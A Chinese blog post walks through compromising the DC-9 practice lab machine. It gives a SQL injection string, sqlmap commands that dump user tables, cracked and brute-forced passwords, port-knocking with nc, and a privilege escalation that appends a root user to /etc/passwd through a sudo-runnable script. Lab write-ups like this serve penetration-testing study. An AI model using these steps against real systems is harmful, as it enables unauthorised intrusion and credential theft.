DC-9 靶机

最新推荐文章于 2024-11-11 17:38:48 发布
最新推荐文章于 2024-11-11 17:38:48 发布
阅读量144 收藏
点赞数
分类专栏: 渗透测试 文章标签: android 网络安全 web安全 安全 服务器 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51559599/article/details/134044673
版权

DC_9

信息搜集

存活检测

image-20231024215650779

详细扫描

image-20231024215713222

后台网页扫描

image-20231024215731984

漏洞利用

漏洞发现

  • 在 search 页面的输入框尝试 sql 注入

    1' or 1=1#

    image-20231024220118367

    返回大量数据

  • sqlmap 爆破数据库

    sqlmap -u http://10.4.7.154/search.php --dbs --batch

    爆破失败,显示未找到参数

    image-20231024220848077

  • 抓包查看

    image-20231024221030943

  • 爆破数据库

    # 查数据库:
sqlmap -u http://10.4.7.154/results.php --data 'search=1' --dbs --batch

    image-20231025090035192

Staff 数据库

  • 爆破表

    #查表:
sqlmap -u http://10.4.7.154/results.php --data 'search=1' -D Staff -tables --batch

    image-20231025090209829

  • 爆破表中数据

    sqlmap -u http://10.4.7.154/results.php --data 'search=1' -D Staff -T Users --dump

    爆破出一条 admin 数据

    image-20231025090516581

  • 密码为 transorbital1

    856f5de590ef37314e7c3bdf6f8a66dc (transorbital1)

users 数据库

  • 爆表

    sqlmap -u http://10.4.7.154/results.php --data 'search=1' -D users -tables --batch

    image-20231025092039018

  • 爆数据

    sqlmap -u http://10.4.7.154/results.php --data 'search=1' -D users -T UserDetails --dump

    image-20231025092142004

  • 筛选用户名

    sqlmap -u http://10.4.7.154/results.php --data 'search=1' -D users -T UserDetails -C username --dump

  • 筛选密码

    sqlmap -u http://10.4.7.154/results.php --data 'search=1' -D users -T UserDetails -C password --dump

  • 将用户名密码分别保存到 user.txt 和 password.txt 文件中

  • ssh 爆破,显示被拒绝

    image-20231025103350952

  • 查阅资料

    SSH 的 knockd 是一种基于端口“敲门”(port knocking)的安全措施,它可以在不暴露 SSH 服务端口的情况下,允许合法用户通过特定的端口序列访问 SSH 服务。

    具体来说,knockd 通过监听特定的端口序列,当用户按照正确的顺序敲击这些端口时,会自动解除对 SSH 服务端口的阻止,从而允许用户访问 SSH 服务。这种方法可以有效地隐藏 SSH 服务,避免暴露在公网中,从而提高系统的安全性。

网页信息搜集

  • 登录网页

    admin
transorbital1

    image-20231025090918260

  • 发现最下方出现“文件不存在”字样

    image-20231025125832824

  • 尝试文件读取

    image-20231025130603947

  • 读取 knockd.conf 文件

    image-20231025130802409

  • 敲击这三个端口打开 ssh

    nc 10.4.7.154 7469
nc 10.4.7.154 8475
nc 10.4.7.154 9842

    image-20231025131302748

  • 敲击后可成爆破

    image-20231025131349103

    login: chandlerb   password: UrAG0D!
login: joeyt   password: Passw0rd
login: janitor   password: Ilovepeepee

提权

  • 挨个用户登录,搜索提权相关信息

    最终在 janitor 登录后发现了一些密码

    image-20231025131835989

  • 使用这些密码再次爆破 user.txt

    image-20231025132304640

    有爆破出 fredf 用户

  • 登录 fredf 用户

    sudo -l 查看 root 权限

    image-20231025132527829

  • 查看 test

    vi /opt/devstuff/dist/test/test

    image-20231025132810910

  • 看不懂,运行一下

    给了提示

    image-20231025132920714

  • 查找 test.py

    find / -name test.py 2>/dev/null

    image-20231025133536592

  • 查看 test.py

    image-20231025133607691

    python 脚本实现了接受两个命令行参数,并将一个文件的内容读取并追加到另一个文件中

  • 尝试向 /etc/passwd 中添加 root 用户

    • 将用户信息写入 shell 文件

      image-20231025134530772

    • 使用有 root 权限的 /opt/devstuff/dist/test/test 写入

      sudo /opt/devstuff/dist/test/test shell /etc/passwd

      成功写入

      image-20231025134654040

  • 不支持无密码登录

    image-20231025134727219

  • 生成加密密码

    openssl passwd -1 -salt admin 123456

    openssl: 是一个开放源代码的加密工具包,提供了各种密码学功能和安全协议的实现。
    passwd: 是 OpenSSL 工具包中的一个命令,用于生成密码哈希值。
    -1: 表示使用 Unix 加密哈希算法(crypt)进行密码哈希。
    -salt admin: 指定盐值为 “admin”,盐值是一个随机字符串,用于增加密码哈希的安全性。
    123456: 是要加密的密码明文。

  • 重新编辑,添加到 /etc/passwd

    image-20231025140237059

  • 切换用户,提权成功

    image-20231025140322616

总结

  • sqlmap 爆破数据库若传参使用 POST 方法需要在 sqlmap 参数中添加 --data 'search=1'
  • ssh knockd 敲击
gjl_
关注
专栏目录
DC-9 靶机渗透
Rex_Surprise的博客
05-10 399
DC-9 靶机渗透 1. 渗透过程 THE_END! DC-9 靶机渗透1. 渗透过程 初期脚本扫描 扫描结果 可以发现 ip地址为:192.168.0.114 ssh (但是ssh无法访问了) 和 http服务s 但是没有其他可用的信息 爆破一下目录 我这里用御剑爆破 输入url: http://192.168.0.114...
DC-9靶机
2301_76690905的博客
12-21 1082
端口敲门规则的好处在于隐藏了服务器的实际开放端口,只有知道正确的敲门序列的客户端才能访问服务器,/etc/knockd.conf 文件是 Knockd 服务的配置文件,它用于指定 Knockd 敲门规则,Knockd 是一种端口伪装技术,可以通过在指定的端口序列上发送特殊的数据包来打开一个或多个防火墙规则以允许传入的连接请求通过。
DC-9靶机渗透学习记录
tyut_dummy的博客
07-13 1748
我们可以通过端口探测进行开启ssh服务。通俗来说端口探测可以理解为,我按顺序敲击端口就可以将ssh服务打开,反之敲击关闭,端口顺序存放在/etc/knockd.conf文件中。发现用户名和密码,尝试在web登陆页面使用,尝试几次后并不能登录,猜测该用户名和密码并不是web登录页面的用户名和密码。kali中安装需要的工具,如:nmap,sqlmap,dirb,hydra,nc,burpsuite等等。发现新的fredf用户,登录该用户,sudo -l命令查看到以root权限运行的文件,进行查看。
VulnHub靶机 DC-9 靶机 详细渗透过程
rumil的博客
04-27 2027
思路:主机发现—端口扫描—服务探测—指纹识别—Web渗透SQL注入—登入后台—文件包含—"敲门"打开22端口—SSH爆破—得到相关用户信息并远程登录—提权—分别搜寻三个用户下的目录文件—拿有价值信息进行查看—得到带有root权限的执行命令—分析并成功提权。ps:如果ssh不能登录,是因为22端口没有打开,流量过滤了,在前面信息收集当中发现22端口是关闭的。拿到的用户名和密码进行后台,登录进行,发现低端爆出文件未找到的信息,可能存在文件包含,根据提示尝试一下,成功读取/etc/passwd。
DC-9靶机渗透测试
读书 买花 长大
05-21 616
DC-9
DC-9靶机渗透详细流程
braty_的博客
02-09 895
DC-9靶机详细流程
DC-9靶机做题记录
Fab1an的博客
01-24 1032
信息收集,目录扫描,开头的步骤很重要SQlmap自动化注入的操作了解加深了解到了Knock服务Hydra工具的使用提权,对/etc/pawwd 文件格式的了解,以及对/etc/sudoers 文件的了解。
DC-9靶机进行渗透测试
zll___的博客
03-24 733
DC-9靶机进行渗透测试
DC-9靶机渗透测试详细教程
啊醒的博客
05-04 2934
DC-8靶机渗透测试详细教程
DC-9靶机渗透
m0_62008601的博客
06-19 859
简单了解dc-9靶机的渗透过程
Vulnhub靶机渗透测试 DC-9靶机
12-07
Vulnhub靶机渗透测试 DC-9靶机
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
DC1-9靶机搭建
EricXT的博客
05-28 892
一、DC实验环境搭建 1.虚拟机环境:选择安装版本VMware Workstation 15.5 DC1-9靶机文件为ova格式,需要新版本VMware的支持导入。 网络连接选择:NAT模式,“”高级”中生成MAC地址。 2.渗透测试系统环境: 选择安装最新版本Kali 2020-2,可在此下载系统安装包。 (1)为Kali安装VMware Tools 开始安装,一路Enter即可,出现以下提醒,表示安装成功。 (2)更新Kali的镜像源: Step1:vim /etc/apt/sources.lis
安卓主板_基于联发科MTK MT8788平台平板电脑方案_安卓核心板开发板定制
最新发布
yangyang__z的博客
11-11 151
我们的产品应用涉及智能手持终端,POS机,广告机,机器人,智能家居,工业控制,车载导航,安防监控,移动医疗,环境监测,培训教育及物联网等相关领域。公司现有研发人员60多人,硕士以上学历占30%,核心人员都是在移动通讯技术领域有着多年研发经验的资深人士,能够提供从工业设计(ID),结构设计(MD),硬件设计(HW),软件设计(SW),生产制造(Manufacturing),测试(TE),品质保障(QA)的全套解决方案。语音编解码器(FR,HR,EFR,AMR FR,AMR HR和宽带AMR)
安卓市场如何做APP的分发、推广?
2401_88539912的博客
11-08 799
然后再加上小米lookalike算法,然后他会为这批用户投放,然后他也有点击根据点击用户的一个画像,再跟用户去进行一个算法的融合,然后再针对这批用户,不断的一个循环曝光,你会发现,整个会越来越精准,我们的投放的广告,目标人群越来越细,我们选了750万的一个人群数量去做,到后来只会针对750万里面可能是我们用户的那150万去曝光,因为他这个效果是没有任何人为干扰,他就是一个黑科技去算的,最后做出来,我们整个作为效果是非常准的。包括一些宣传,主打是整个品牌度,拍照、有声有色,帅气,年轻化。
【北京迅为】itop-3588开发板摄像头使用手册Android12 双摄方案
Chihiro_S的专栏
11-08 862
【北京迅为】itop-3588开发板摄像头使用手册Android12 双路摄像头方案
Android 编译系统
xuanyulevel6的博客
11-11 502
Android.mk是以前Android项目中常用的构建脚本文件,Android.bp是用来替换Android.mk的配置文件,它使用Blueprint框架来解析。Blueprint是生成、解析Android.bp的工具,是Soong的一部分。Soong则是专为Android编译而设计的工具,Blueprint只是解析文件的形式,而Soong则解释内容的含义,最终转换成Ninja文件。Android.bp文件用类似JSON的简洁声明来描述需要构建的模块。基础了解请看Android.bp你真的了解吗在性能上。
Android】名不符实的Window类
2303_79296612的博客
11-08 1044
FEATURE_开头的属性凡是以 FEATURE_ 开头的静态常量都是定义当前窗口具有什么特性(比如界面是带有标题栏呢,还是节目带有action bar)FEATURE_OPTIONS_PANEL:代表创建action bar的menuFEATURE_NO_TITLE:代表不显示标题栏FEATURE_PROGRESS:如果显示标题栏,则标题栏中显示进度条FEATURE_LEFT_ICON:如果显示标题栏,则标题栏显示左iconFEATURE_CUSTOM_TITLE:代表自定义标题栏。
一文学习Android中的Treeview
执剑人
11-08 742
Android开发中,TreeView是一种用于显示层次结构的组件,可以让用户展开和折叠子项,以方便查看数据的不同层次。TreeView在文件系统、组织架构、目录结构等场景中非常有用,尽管Android并未提供内置的TreeView控件,但可以通过一些方式实现类似效果。下面介绍如何在Android中实现一个简单的TreeView,通常是通过自定义适配器和数据结构来构建。
渗透DC-1靶机设计思路
05-24
1. 确定目标:首先需要确定渗透的目标,即DC-1靶机。 2. 收集信息:收集关于DC-1的信息,如IP地址、开放端口、操作系统等。可以使用工具如nmap、whois、dnsrecon等进行信息搜集。 3. 扫描漏洞:使用漏洞扫描工具如...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

gjl_

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值